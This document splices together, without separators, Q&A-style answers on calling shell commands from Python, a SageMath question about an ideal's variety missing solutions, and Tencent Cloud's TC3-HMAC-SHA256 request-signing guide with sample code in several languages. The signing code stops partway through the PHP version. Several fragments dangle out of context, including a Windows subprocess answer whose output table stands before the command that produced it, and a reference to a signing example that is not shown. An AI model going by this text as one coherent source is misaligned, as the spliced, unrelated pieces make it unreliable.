
I'm quite fond of shell_command for its simplicity. It's built on top of the subprocess module.

Here's an example from the docs:
>>> from shell_command import shell_call
>>> shell_call("ls *.py")
setup.py shell_command.py test_shell_command.py
0
>>> shell_call("ls -l *.py")
-rw-r--r-- 1 ncoghlan ncoghlan 391 2011-12-11 12:07 setup.py
-rw-r--r-- 1 ncoghlan ncoghlan 7855 2011-12-11 16:16 shell_command.py
-rwxr-xr-x 1 ncoghlan ncoghlan 8463 2011-12-11 16:17 test_shell_command.py
0
Some hints on detaching the child process from the calling one (i.e., starting the child process in the background).

Suppose you want to start a long task from a CGI script; that is, the child process should live longer than the CGI script execution process itself.

The classic example from the subprocess module docs is:
import subprocess
import sys
# some code here
pid = subprocess.Popen([sys.executable, "longtask.py"]) # call subprocess
# some more code here
The idea here is that you do not want to wait on the "call subprocess" line until longtask.py is finished, but it is not clear what happens after the "some more code here" line of the example.

My target platform was FreeBSD, but the development was on Windows, so I faced the problem on Windows first.

On Windows (Windows XP), the parent process will not finish until longtask.py has finished its work. That is not what you want in a CGI script. The problem is not specific to Python; in the PHP community the problems are the same.

The solution is to pass the DETACHED_PROCESS process creation flag to the underlying CreateProcess function in the Windows API. If you happen to have pywin32 installed, you can import the flag from the win32process module; otherwise you should define it yourself:
DETACHED_PROCESS = 0x00000008
pid = subprocess.Popen([sys.executable, "longtask.py"],
creationflags=DETACHED_PROCESS).pid
/* UPD 2015.10.27: @eryksun points out in a comment below that the semantically correct flag is CREATE_NEW_CONSOLE (0x00000010) */

On FreeBSD we have another problem: when the parent process is finished, it finishes the child processes as well. That is not what you want in a CGI script either. Some experiments showed that the problem seemed to be in sharing sys.stdout, and the working solution was the following:
pid = subprocess.Popen([sys.executable, "longtask.py"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
I have not checked the code on other platforms and do not know the reasons for the behaviour on FreeBSD. If anyone does, please share your ideas. Googling for starting background processes in Python has not shed any light yet.

There are many different libraries which allow you to call external commands with Python. For each library I've given a description and shown an example of calling an external command. The command I used as the example is ls -l (list all files). If you want to find out more about any of the libraries, I have listed and linked the docs for each of them.

Sources:
subprocess: https://docs.python.org/3.5/library/subprocess.html
shlex: https://docs.python.org/3/library/shlex.html
os: https://docs.python.org/3.5/library/os.html
sh: https://amoffat.github.io/sh/
plumbum: https://plumbum.readthedocs.io/en/latest/
pexpect: https://pexpect.readthedocs.io/en/stable/
fabric: http://www.fabfile.org/
envoy: https://github.com/kennethreitz/envoy
commands: https://docs.python.org/2/library/commands.html
These are all the libraries; hopefully this helps you decide which one to use :)

subprocess

subprocess allows you to call external commands and connect them to their input/output/error pipes (stdin, stdout, and stderr). subprocess is the default choice for running commands, but sometimes other modules are better.
subprocess.run(["ls", "-l"]) # Run command
subprocess.run(["ls", "-l"], stdout=subprocess.PIPE) # This will run the command and return any output
subprocess.run(shlex.split("ls -l")) # You can also use the shlex library to split the command
os

os is used for "operating system dependent functionality". It can also be used to call external commands, with os.system and os.popen (note: there is also a subprocess.popen). os will always run the shell, and it is a simple alternative for people who don't need to, or don't know how to, use subprocess.run.
os.system("ls -l") # run command
os.popen("ls -l").read() # This will run the command and return any output
sh

sh is a subprocess interface which lets you call programs as if they were functions. This is useful if you want to run a command multiple times.
sh.ls("-l") # Run command normally
ls_cmd = sh.Command("ls") # Save command as a variable
ls_cmd() # Run command as if it were a function
plumbum

plumbum is a library for "script-like" Python programs. You can call programs like functions, as with sh. plumbum is useful if you want to run a pipeline without the shell.
from plumbum import local

ls_cmd = local["ls"]["-l"]  # get command
ls_cmd()  # run command
pexpect

pexpect lets you spawn child applications, control them, and find patterns in their output. This is a better alternative to subprocess for commands that expect a tty on Unix.
import pexpect

pexpect.run("ls -l")  # Run command as normal
child = pexpect.spawn('scp foo user@example.com:.')  # Spawn child application
child.expect('Password:')  # When this is the output
child.sendline('mypassword')
fabric

fabric is a Python 2.5 and 2.7 library. It allows you to execute local and remote shell commands. Fabric is a simple alternative for running commands in a secure shell (SSH).
import fabric.operations

fabric.operations.local('ls -l')  # Run command as normal
fabric.operations.local('ls -l', capture=True)  # Run command and receive output
envoy

envoy is known as "subprocess for humans". It is used as a convenience wrapper around the subprocess module.
import envoy

r = envoy.run("ls -l")  # Run command
r.std_out  # get output
commands

commands contains wrapper functions for os.popen, but it has been removed from Python 3, since subprocess is a better alternative.
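In Python 3, the closest stand-ins (as far as I know) are subprocess.getoutput and subprocess.getstatusoutput:

import subprocess

# Python 3 replacements for commands.getoutput / commands.getstatusoutput
output = subprocess.getoutput("ls -l")
status, output = subprocess.getstatusoutput("ls -l")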
This edit was based on J.F. Sebastian's comment.

Check out the pexpect Python library.

It allows interactive control of external programs/commands, even ssh, ftp, telnet, etc. You can just type something like this:
child = pexpect.spawn('ftp 192.168.0.24')
child.expect('(?i)name .*: ')
child.sendline('anonymous')
child.expect('(?i)password')
Without retrieving the result:
import os
os.system("your command here")
Retrieving the result:
import commands
commands.getoutput("your command here")
or
commands.getstatusoutput("your command here")
This is how I run my commands. This code has everything you need:
from subprocess import Popen, PIPE
cmd = "ls -l ~/"
p = Popen(cmd , shell=True, stdout=PIPE, stderr=PIPE)
out, err = p.communicate()
print "Return code: ", p.returncode
print out.rstrip(), err.rstrip()
There is another difference here which is not mentioned above.

subprocess.Popen executes the <command> as a subprocess. In my case, I needed to execute a file <a> which needed to communicate with another program, <b>.

I tried subprocess, and the execution was successful. However, <b> could not communicate with <a>. Everything works fine when I run both from the terminal.

One more: (Note: kwrite behaves differently from other applications. If you try the following with Firefox, the results will not be the same.)

If you try os.system("kwrite"), program flow freezes until the user closes kwrite. To overcome that I tried os.system("konsole -e kwrite") instead. This time the program continued to flow, but kwrite became a subprocess of the console.

Is there a way to run kwrite so that it is not a subprocess (i.e., in the system monitor it must appear at the leftmost edge of the tree)?

On Windows you can import the subprocess module and run external commands by calling subprocess.Popen(), subprocess.Popen().communicate() and subprocess.Popen().wait(), as below:
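For example, a minimal sketch of that pattern (the neutron net-list command is only an assumption on my part, chosen to match the sample output below; substitute your own command):

import subprocess

# Run the command, capturing stdout/stderr
proc = subprocess.Popen(["neutron", "net-list"],
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()  # also waits for the process to exit
print(out.decode())

# Pick the ID of the row labelled "External" out of the table
for line in out.decode().splitlines():
    if "External" in line:
        print(line.split("|")[1].strip())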
+--------------------------------------+------------+------+
| ID | Label | CIDR |
+--------------------------------------+------------+------+
| 431c9014-5b5d-4b51-a357-66020ffbb123 | test1 | None |
| 27a74fcd-37c0-4789-9414-9531b7e3f126 | External | None |
| 5a2712e9-70dc-4b0e-9281-17e02f4684c9 | management | None |
| 7aa697f5-0e60-4c15-b4cc-9cb659698512 | Internal | None |
+--------------------------------------+------------+------+
Output:
27a74fcd-37c0-4789-9414-9531b7e3f126
I.variety() : missing solution values
Hi there!
The following code:
sage: R.<x1,x2,x3,x4,x5> = PolynomialRing(RR,5,order='lex')
sage: f1=x1+x2+x3+x4+x5
sage: f2=x1*x2+x2*x3+x3*x4+x4*x5+x1*x5
sage: f3=x1*x2*x3+x2*x3*x4+x3*x4*x5+x4*x5*x1+x5*x1*x2
sage: f4=x1*x2*x3*x4+x2*x3*x4*x5+x3*x4*x5*x1+x4*x5*x1*x2+x5*x1*x2*x3
sage: f5=x1*x2*x3*x4*x5-1
sage: I = Ideal(f1,f2,f3,f4,f5)
sage: I.variety()
produces
verbose 0 (2403: multi_polynomial_ideal.py, variety) Warning: falling back to very slow toy implementation.
[{x5: -2.61803398874989}, {x5: -0.381966011250105}, {x5: 1.00000000000000}]
which seems to be missing a large number of solution values, and only produces values for x5, even in the solutions it does report, for some reason. A similar problem occurs if I solve over CC rather than RR (but that involves a lot more text, so this seemed nicer to copy/paste).
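(Aside: my understanding is that the usual workaround is to define the ideal over an exact field such as QQ and request the variety over QQbar, since the Groebner-basis machinery behind variety() is numerically fragile over inexact rings like RR and CC. A sketch, not verified here:)

sage: R.<x1,x2,x3,x4,x5> = PolynomialRing(QQ, 5, order='lex')
sage: f1 = x1+x2+x3+x4+x5
sage: f2 = x1*x2+x2*x3+x3*x4+x4*x5+x1*x5
sage: f3 = x1*x2*x3+x2*x3*x4+x3*x4*x5+x4*x5*x1+x5*x1*x2
sage: f4 = x1*x2*x3*x4+x2*x3*x4*x5+x3*x4*x5*x1+x4*x5*x1*x2+x5*x1*x2*x3
sage: f5 = x1*x2*x3*x4*x5-1
sage: I = Ideal(f1,f2,f3,f4,f5)
sage: sols = I.variety(QQbar)   # exact arithmetic; algebraic solutions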
If I change the order from lex to degrevlex, I.variety() fails with the following error message:
verbose 0 (2403: multi_polynomial_ideal.py, variety) Warning: falling back to very slow toy implementation.
---------------------------------------------------------------------------
NotImplementedError Traceback (most recent call last)
<ipython-input-479-cb6d916bc8b3> in <module>()
----> 1 I.variety()
/Applications/sage/local/lib/python2.7/site-packages/sage/rings/polynomial/multi_polynomial_ideal.pyc in __call__(self, *args, **kwds)
603 if not R.base_ring().is_field():
604 raise ValueError("Coefficient ring must be a field for function '%s'."%(self.f.__name__))
--> 605 return self.f(self._instance, *args, **kwds)
606
607 require_field = RequireField
/Applications/sage/local/lib/python2.7/site-packages/sage/rings/polynomial/multi_polynomial_ideal.pyc in variety(self, ring)
2667 if self.ring().term_order().is_global():
2668 verbose("Warning: falling back to very slow toy implementation.", level=0)
-> 2669 T = toy_variety.triangular_factorization(self.groebner_basis())
2670 else:
2671 raise TypeError("Local/unknown orderings not supported by 'toy_buchberger' implementation.")
/Applications/sage/local/lib/python2.7/site-packages/sage/rings/polynomial/toy_variety.pyc in triangular_factorization(B, n)
279 # recursively build the family,
280 # looping through the factors of p
--> 281 for (q,a) in p.factor():
282 # Construct an analog to I in (R.quotient(R.ideal(q)))[x_0,x_1,...x_{n-1}]
283 I = R.ideal([each.reduce([q]) for each in G])
/Applications/sage/local/lib/python2.7/site-packages/sage/rings/polynomial/multi_polynomial_element.pyc in factor(self, proof)
1662 raise NotImplementedError("Factorization of multivariate polynomials over prime fields with characteristic > 2^29 is not implemented.")
1663 if proof:
-> 1664 raise NotImplementedError("proof = True factorization not implemented. Call factor with proof=False.")
1665
1666 R._singular_().set_ring()
which is kind of mystifying, since we're working over either RR or CC, both of which have characteristic 0, and neither of which is a prime field. I thought maybe it's related to I.variety()'s odd behavior under lex order somehow, though, so it seemed worth including here.
I know this system has 10 real solutions (it's an example from HOM4PS2's documentation, and ...
TencentCloud API authenticates every single request, i.e., the request must be signed using the security credentials in the designated steps. Each request has to contain the signature information (Signature) in the common request parameters and be sent in the specified way and format.
The security credential used in this document is a key, which includes a SecretId and a SecretKey. Each user can have up to two pairs of keys.
You can apply for the security credentials through the following steps:
TencentCloud API comes with SDKs for seven commonly used programming languages, including Python, Java, PHP, Go, NodeJS, and .NET. In addition, it provides API Explorer, which enables online calls, signature verification, and SDK code generation. If you have any trouble calculating a signature, consult these resources.
Compatible with the previous HmacSHA1 and HmacSHA256 signature algorithms, the TC3-HMAC-SHA256 signature algorithm is more secure and supports larger requests and JSON format with better performance. We recommend using TC3-HMAC-SHA256 to calculate the signature.
TencentCloud API supports both GET and POST requests. For the GET method, only the Content-Type: application/x-www-form-urlencoded protocol format is supported. For the POST method, two protocol formats are supported: Content-Type: application/json and Content-Type: multipart/form-data. The JSON format is supported by default for all business APIs; the multipart format is supported only for specific business APIs, in which case the API cannot be called in JSON format. See the specific business API documentation for more information. The POST method is recommended: there is no difference in the results of the two methods, but the GET method only supports request packets up to 32 KB.
The following uses querying the list of CVM instances in the Guangzhou region as an example to describe the steps of signature concatenation.

In this example, we try to choose common parameters and API parameters that are prone to mistakes. When you actually call an API, use parameters based on the actual conditions. The parameters vary by API; do not copy the parameters and values from this example.
Assuming that your SecretId and SecretKey are AKIDz8krbsJ5yKBZQpn74WFkmLPx3******* and Gu5t9xGARNpq86cd98joQYCN3*******, respectively, if you want to view the status of the instance in the Guangzhou region whose CVM instance name is "unnamed" and have only one data entry returned, then the request may be:
curl -X POST https://cvm.tencentcloudapi.com \
-H "Authorization: TC3-HMAC-SHA256 Credential=AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******/2019-02-25/cvm/tc3_request, SignedHeaders=content-type;host, Signature=c492e8e41437e97a620b728c301bb8d17e7dc0c17eeabce80c20cd70fc3a78ff" \
-H "Content-Type: application/json; charset=utf-8" \
-H "Host: cvm.tencentcloudapi.com" \
-H "X-TC-Action: DescribeInstances" \
-H "X-TC-Timestamp: 1551113065" \
-H "X-TC-Version: 2017-03-12" \
-H "X-TC-Region: ap-guangzhou" \
-d '{"Limit": 1, "Filters": [{"Values": ["unnamed"], "Name": "instance-name"}]}'
The signature calculation process is explained in detail below.
Concatenate the canonical request string (CanonicalRequest) in the following pseudocode format:
CanonicalRequest =
HTTPRequestMethod + '\n' +
CanonicalURI + '\n' +
CanonicalQueryString + '\n' +
CanonicalHeaders + '\n' +
SignedHeaders + '\n' +
HashedRequestPayload
Field explanations:

HTTPRequestMethod: HTTP request method (GET or POST). This example uses POST.

CanonicalURI: URI parameter. Slash ("/") is used for API 3.0.

CanonicalQueryString: The query string in the URL of the originating HTTP request. This is always an empty string "" for POST requests, and is the string after the question mark (?) for GET requests, for example: Limit=10&Offset=0.

Note: CanonicalQueryString must be URL-encoded per RFC 3986 using the UTF-8 character set. We recommend using your programming language's standard library; all special characters must be encoded, with hexadecimal letters in uppercase.

CanonicalHeaders: Header information for signature calculation, including at least the host and content-type headers. Custom headers can be added to participate in the signature process to improve the uniqueness and security of the request.

Concatenation rules: content-type:application/json; charset=utf-8\nhost:cvm.tencentcloudapi.com\n

Note: content-type must match the actually sent content. In some programming languages, a charset value is added even if it is not specified; in that case the request sent differs from the one signed, and the server will return an error indicating that signature verification failed.

SignedHeaders: Header information for signature calculation, indicating which headers of the request participate in the signature process (they must each correspond to a header in CanonicalHeaders). content-type and host are required headers.

Concatenation rules: content-type;host

HashedRequestPayload: Hash value of the request payload (i.e., the body, such as {"Limit": 1, "Filters": [{"Values": ["unnamed"], "Name": "instance-name"}]} in this example). The pseudocode for the calculation is Lowercase(HexEncode(Hash.SHA256(RequestPayload))): SHA-256 hash the payload of the HTTP request, hex-encode the digest, and convert the encoded string to lowercase. For GET requests, RequestPayload is always an empty string. The calculation result in this example is 99d58dfbc6745f6747f36bfca17dee5e6881dc0428a0a36f96199342bc5b4907.
According to the rules above, the CanonicalRequest string obtained in the example is as follows:
POST
/
content-type:application/json; charset=utf-8
host:cvm.tencentcloudapi.com
content-type;host
99d58dfbc6745f6747f36bfca17dee5e6881dc0428a0a36f96199342bc5b4907
The string to sign is concatenated as follows:
StringToSign =
Algorithm + \n +
RequestTimestamp + \n +
CredentialScope + \n +
HashedCanonicalRequest
Field explanations:

Algorithm: Signature algorithm, which is currently always TC3-HMAC-SHA256.

RequestTimestamp: Request timestamp, i.e., the value of the common parameter X-TC-Timestamp in the request header, which is the UNIX timestamp of the current time in seconds, such as 1551113065 in this example.

CredentialScope: Scope of the credential, in the format Date/service/tc3_request, comprising the date, the requested service, and the termination string (tc3_request). Date is a date in UTC time, whose value should match the UTC date converted from the common parameter X-TC-Timestamp; service is the product name, which should match the domain name of the product called. The calculation result in this example is 2019-02-25/cvm/tc3_request.

HashedCanonicalRequest: Hash value of the CanonicalRequest string concatenated in the steps above. The pseudocode for the calculation is Lowercase(HexEncode(Hash.SHA256(CanonicalRequest))). The calculation result in this example is 2815843035062fffda5fd6f2a44ea8a34818b0dc46f024b8b3786976a3adda7a.
Note:

Date must be calculated from the timestamp X-TC-Timestamp in the UTC+0 time zone. If you use the system's local time zone (such as UTC+8) instead, calls may succeed during the day but will reliably fail around 00:00. For example, if the timestamp is 1551113065 and the time in UTC+8 is 2019-02-26 00:44:25, the UTC+0 date in the calculated Date value should be 2019-02-25, not 2019-02-26.

Timestamp must be the same as your current system time, and your system time must be in sync with standard time; if the difference between Timestamp and your current system time is larger than five minutes, the request will fail. If your system time stays out of sync with standard time, the request will fail with a signature expiration error.
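For instance, in Python the rule above amounts to the following small sketch, using this document's example timestamp:

from datetime import datetime, timezone

timestamp = 1551113065
# Always derive Date from the timestamp in UTC, never from the local time zone
date = datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d")
print(date)  # 2019-02-25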
According to the preceding rules, the string to be signed obtained in the example is as follows:
TC3-HMAC-SHA256
1551113065
2019-02-25/cvm/tc3_request
2815843035062fffda5fd6f2a44ea8a34818b0dc46f024b8b3786976a3adda7a
1) Calculate the derived signature key with the following pseudocode:
SecretKey = "Gu5t9xGARNpq86cd98joQYCN3*******"
SecretDate = HMAC_SHA256("TC3" + SecretKey, Date)
SecretService = HMAC_SHA256(SecretDate, Service)
SecretSigning = HMAC_SHA256(SecretService, "tc3_request")
Field explanations:

SecretKey: The original SecretKey, i.e., Gu5t9xGARNpq86cd98joQYCN3*******.

Date: The Date field information in Credential, such as 2019-02-25 in this example.

Service: The value in the Service field in Credential, such as cvm in this example.
2) Calculate the signature with the following pseudocode:
Signature = HexEncode(HMAC_SHA256(SecretSigning, StringToSign))
The Authorization is concatenated as follows:
Authorization =
Algorithm + ' ' +
'Credential=' + SecretId + '/' + CredentialScope + ', ' +
'SignedHeaders=' + SignedHeaders + ', ' +
'Signature=' + Signature
Field explanations:

Algorithm: Signature algorithm, which is always TC3-HMAC-SHA256.

SecretId: The SecretId in the key pair, i.e., AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******.

CredentialScope: Credential scope (see above). The calculation result in this example is 2019-02-25/cvm/tc3_request.

SignedHeaders: Header information for signature calculation (see above), such as content-type;host in this example.

Signature: Signature value. The calculation result in this example is c492e8e41437e97a620b728c301bb8d17e7dc0c17eeabce80c20cd70fc3a78ff.
According to the rules above, the value obtained in the example is:
TC3-HMAC-SHA256 Credential=AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******/2019-02-25/cvm/tc3_request, SignedHeaders=content-type;host, Signature=c492e8e41437e97a620b728c301bb8d17e7dc0c17eeabce80c20cd70fc3a78ff
The following example shows a finished authorization header:
POST https://cvm.tencentcloudapi.com/
Authorization: TC3-HMAC-SHA256 Credential=AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******/2019-02-25/cvm/tc3_request, SignedHeaders=content-type;host, Signature=c492e8e41437e97a620b728c301bb8d17e7dc0c17eeabce80c20cd70fc3a78ff
Content-Type: application/json; charset=utf-8
Host: cvm.tencentcloudapi.com
X-TC-Action: DescribeInstances
X-TC-Version: 2017-03-12
X-TC-Timestamp: 1551113065
X-TC-Region: ap-guangzhou
{"Limit": 1, "Filters": [{"Values": ["unnamed"], "Name": "instance-name"}]}
When calling API 3.0, we recommend using the corresponding Tencent Cloud SDK 3.0, which encapsulates the signature process so that you can focus on the product APIs themselves during development. See SDK Center for more information. Currently, the following programming languages are supported:

To further explain the signing process, we implement the process described above in several programming languages, using the request domain name, API, and parameter values from the sample. The goal of this example is only to provide additional clarification for the signature process; see the SDK for actual usage.
The final output URL might be: https://cvm.tencentcloudapi.com/?Action=DescribeInstances&InstanceIds.0=ins-09dx96dg&Limit=20&Nonce=11886&Offset=0&Region=ap-guangzhou&SecretId=AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******&Signature=EliP9YW3pW28FpsEdkXt%2F%2BWcGeI%3D&Timestamp=1465185768&Version=2017-03-12.
Note: The key in the example is fictitious, and the timestamp is not the current system time, so if this URL is opened in a browser or called using a command such as curl, an authentication error will be returned: Signature expired. To get a URL that works properly, replace the SecretId and SecretKey in the example with your real credentials and use the current system time as the Timestamp.

Note: In the example below, even if you use the same programming language, the order of the parameters in the URL may differ for each execution. However, the order does not matter, as long as all the parameters are included in the URL and the signature is calculated correctly.

Note: The following code is only applicable to API 3.0 and cannot be used directly in other signature processes. Even with an older API, signature calculation errors may occur due to differences in details; refer to the corresponding documentation.
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.TimeZone;
import java.util.TreeMap;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import javax.xml.bind.DatatypeConverter;
public class TencentCloudAPITC3Demo {
private final static Charset UTF8 = StandardCharsets.UTF_8;
private final static String SECRET_ID = "AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******";
private final static String SECRET_KEY = "Gu5t9xGARNpq86cd98joQYCN3*******";
private final static String CT_JSON = "application/json; charset=utf-8";
public static byte[] hmac256(byte[] key, String msg) throws Exception {
Mac mac = Mac.getInstance("HmacSHA256");
SecretKeySpec secretKeySpec = new SecretKeySpec(key, mac.getAlgorithm());
mac.init(secretKeySpec);
return mac.doFinal(msg.getBytes(UTF8));
}
public static String sha256Hex(String s) throws Exception {
MessageDigest md = MessageDigest.getInstance("SHA-256");
byte[] d = md.digest(s.getBytes(UTF8));
return DatatypeConverter.printHexBinary(d).toLowerCase();
}
public static void main(String[] args) throws Exception {
String service = "cvm";
String host = "cvm.tencentcloudapi.com";
String region = "ap-guangzhou";
String action = "DescribeInstances";
String version = "2017-03-12";
String algorithm = "TC3-HMAC-SHA256";
String timestamp = "1551113065";
//String timestamp = String.valueOf(System.currentTimeMillis() / 1000);
SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd");
// Pay attention to the time zone; otherwise, errors may occur
sdf.setTimeZone(TimeZone.getTimeZone("UTC"));
String date = sdf.format(new Date(Long.valueOf(timestamp + "000")));
// ************* Step 1: Concatenate the CanonicalRequest string *************
String httpRequestMethod = "POST";
String canonicalUri = "/";
String canonicalQueryString = "";
String canonicalHeaders = "content-type:application/json; charset=utf-8\n" + "host:" + host + "\n";
String signedHeaders = "content-type;host";
String payload = "{\"Limit\": 1, \"Filters\": [{\"Values\": [\"unnamed\"], \"Name\": \"instance-name\"}]}";
String hashedRequestPayload = sha256Hex(payload);
String canonicalRequest = httpRequestMethod + "\n" + canonicalUri + "\n" + canonicalQueryString + "\n"
+ canonicalHeaders + "\n" + signedHeaders + "\n" + hashedRequestPayload;
System.out.println(canonicalRequest);
// ************* Step 2: Concatenate the string to sign *************
String credentialScope = date + "/" + service + "/" + "tc3_request";
String hashedCanonicalRequest = sha256Hex(canonicalRequest);
String stringToSign = algorithm + "\n" + timestamp + "\n" + credentialScope + "\n" + hashedCanonicalRequest;
System.out.println(stringToSign);
// ************* Step 3: Calculate the signature *************
byte[] secretDate = hmac256(("TC3" + SECRET_KEY).getBytes(UTF8), date);
byte[] secretService = hmac256(secretDate, service);
byte[] secretSigning = hmac256(secretService, "tc3_request");
String signature = DatatypeConverter.printHexBinary(hmac256(secretSigning, stringToSign)).toLowerCase();
System.out.println(signature);
// ************* Step 4: Concatenate the Authorization *************
String authorization = algorithm + " " + "Credential=" + SECRET_ID + "/" + credentialScope + ", "
+ "SignedHeaders=" + signedHeaders + ", " + "Signature=" + signature;
System.out.println(authorization);
TreeMap<String, String> headers = new TreeMap<String, String>();
headers.put("Authorization", authorization);
headers.put("Content-Type", CT_JSON);
headers.put("Host", host);
headers.put("X-TC-Action", action);
headers.put("X-TC-Timestamp", timestamp);
headers.put("X-TC-Version", version);
headers.put("X-TC-Region", region);
StringBuilder sb = new StringBuilder();
sb.append("curl -X POST https://").append(host)
.append(" -H \"Authorization: ").append(authorization).append("\"")
.append(" -H \"Content-Type: application/json; charset=utf-8\"")
.append(" -H \"Host: ").append(host).append("\"")
.append(" -H \"X-TC-Action: ").append(action).append("\"")
.append(" -H \"X-TC-Timestamp: ").append(timestamp).append("\"")
.append(" -H \"X-TC-Version: ").append(version).append("\"")
.append(" -H \"X-TC-Region: ").append(region).append("\"")
.append(" -d '").append(payload).append("'");
System.out.println(sb.toString());
}
}
# -*- coding: utf-8 -*-
import hashlib, hmac, json, os, sys, time
from datetime import datetime
# Key Parameters
secret_id = "AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******"
secret_key = "Gu5t9xGARNpq86cd98joQYCN3*******"
service = "cvm"
host = "cvm.tencentcloudapi.com"
endpoint = "https://" + host
region = "ap-guangzhou"
action = "DescribeInstances"
version = "2017-03-12"
algorithm = "TC3-HMAC-SHA256"
#timestamp = int(time.time())
timestamp = 1551113065
date = datetime.utcfromtimestamp(timestamp).strftime("%Y-%m-%d")
params = {"Limit": 1, "Filters": [{"Name": "instance-name", "Values": ["unnamed"]}]}
# ************* Step 1: Concatenate the CanonicalRequest string *************
http_request_method = "POST"
canonical_uri = "/"
canonical_querystring = ""
ct = "application/json; charset=utf-8"
payload = json.dumps(params)
canonical_headers = "content-type:%s\nhost:%s\n" % (ct, host)
signed_headers = "content-type;host"
hashed_request_payload = hashlib.sha256(payload.encode("utf-8")).hexdigest()
canonical_request = (http_request_method + "\n" +
canonical_uri + "\n" +
canonical_querystring + "\n" +
canonical_headers + "\n" +
signed_headers + "\n" +
hashed_request_payload)
print(canonical_request)
# ************* Step 2: Concatenate the string to sign *************
credential_scope = date + "/" + service + "/" + "tc3_request"
hashed_canonical_request = hashlib.sha256(canonical_request.encode("utf-8")).hexdigest()
string_to_sign = (algorithm + "\n" +
str(timestamp) + "\n" +
credential_scope + "\n" +
hashed_canonical_request)
print(string_to_sign)
# ************* Step 3: Calculate the Signature *************
# Function for computing signature digest
def sign(key, msg):
    return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()
secret_date = sign(("TC3" + secret_key).encode("utf-8"), date)
secret_service = sign(secret_date, service)
secret_signing = sign(secret_service, "tc3_request")
signature = hmac.new(secret_signing, string_to_sign.encode("utf-8"), hashlib.sha256).hexdigest()
print(signature)
# ************* Step 4: Concatenate the Authorization *************
authorization = (algorithm + " " +
"Credential=" + secret_id + "/" + credential_scope + ", " +
"SignedHeaders=" + signed_headers + ", " +
"Signature=" + signature)
print(authorization)
print('curl -X POST ' + endpoint
+ ' -H "Authorization: ' + authorization + '"'
+ ' -H "Content-Type: application/json; charset=utf-8"'
+ ' -H "Host: ' + host + '"'
+ ' -H "X-TC-Action: ' + action + '"'
+ ' -H "X-TC-Timestamp: ' + str(timestamp) + '"'
+ ' -H "X-TC-Version: ' + version + '"'
+ ' -H "X-TC-Region: ' + region + '"'
+ " -d '" + payload + "'")
package main
import (
"crypto/hmac"
"crypto/sha256"
"encoding/hex"
"fmt"
"time"
)
func sha256hex(s string) string {
b := sha256.Sum256([]byte(s))
return hex.EncodeToString(b[:])
}
func hmacsha256(s, key string) string {
hashed := hmac.New(sha256.New, []byte(key))
hashed.Write([]byte(s))
return string(hashed.Sum(nil))
}
func main() {
secretId := "AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******"
secretKey := "Gu5t9xGARNpq86cd98joQYCN3*******"
host := "cvm.tencentcloudapi.com"
algorithm := "TC3-HMAC-SHA256"
service := "cvm"
version := "2017-03-12"
action := "DescribeInstances"
region := "ap-guangzhou"
//var timestamp int64 = time.Now().Unix()
var timestamp int64 = 1551113065
// step 1: build canonical request string
httpRequestMethod := "POST"
canonicalURI := "/"
canonicalQueryString := ""
canonicalHeaders := "content-type:application/json; charset=utf-8\n" + "host:" + host + "\n"
signedHeaders := "content-type;host"
payload := `{"Limit": 1, "Filters": [{"Values": ["unnamed"], "Name": "instance-name"}]}`
hashedRequestPayload := sha256hex(payload)
canonicalRequest := fmt.Sprintf("%s\n%s\n%s\n%s\n%s\n%s",
httpRequestMethod,
canonicalURI,
canonicalQueryString,
canonicalHeaders,
signedHeaders,
hashedRequestPayload)
fmt.Println(canonicalRequest)
// step 2: build string to sign
date := time.Unix(timestamp, 0).UTC().Format("2006-01-02")
credentialScope := fmt.Sprintf("%s/%s/tc3_request", date, service)
hashedCanonicalRequest := sha256hex(canonicalRequest)
string2sign := fmt.Sprintf("%s\n%d\n%s\n%s",
algorithm,
timestamp,
credentialScope,
hashedCanonicalRequest)
fmt.Println(string2sign)
// step 3: sign string
secretDate := hmacsha256(date, "TC3"+secretKey)
secretService := hmacsha256(service, secretDate)
secretSigning := hmacsha256("tc3_request", secretService)
signature := hex.EncodeToString([]byte(hmacsha256(string2sign, secretSigning)))
fmt.Println(signature)
// step 4: build authorization
authorization := fmt.Sprintf("%s Credential=%s/%s, SignedHeaders=%s, Signature=%s",
algorithm,
secretId,
credentialScope,
signedHeaders,
signature)
fmt.Println(authorization)
curl := fmt.Sprintf(`curl -X POST https://%s\
-H "Authorization: %s"\
-H "Content-Type: application/json; charset=utf-8"\
-H "Host: %s" -H "X-TC-Action: %s"\
-H "X-TC-Timestamp: %d"\
-H "X-TC-Version: %s"\
-H "X-TC-Region: %s"\
-d '%s'`, host, authorization, host, action, timestamp, version, region, payload)
fmt.Println(curl)
}
<?php
$secretId = "AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******";
$secretKey = "Gu5t9xGARNpq86cd98joQYCN3*******";
$host = "cvm.tencentcloudapi.com";
$service = "cvm";
$version = "2017-03-12";
$action = "DescribeInstances";
$region = "ap-guangzhou";
// $timestamp = time();
$timestamp = 1551113065;
$algorithm = "TC3-HMAC-SHA256";
// step 1: build canonical request string
$httpRequestMethod = "POST";
$canonicalUri = "/";
$canonicalQueryString = "";
$canonicalHeaders = "content-type:application/json; charset=utf-8\n"."host:".$host."\n";
$signedHeaders = "content-type;host";
$payload = '{"Limit": 1, "Filters": [{"Values": ["unnamed"], "Name": "instance-name"}]}';
$hashedRequestPayload = hash("SHA256", $payload);
$canonicalRequest = $httpRequestMethod."\n"
.$canonicalUri."\n"
.$canonicalQueryString."\n"
.$canonicalHeaders."\n"
.$signedHeaders."\n"
.$hashedRequestPayload;
echo $canonicalRequest.PHP_EOL;
// step 2: build string to sign
$date = gmdate("Y-m-d", $timestamp);
$credentialScope = $date."/".$service."/tc3_request";
$hashedCanonicalRequest = hash("SHA256", $canonicalRequest);
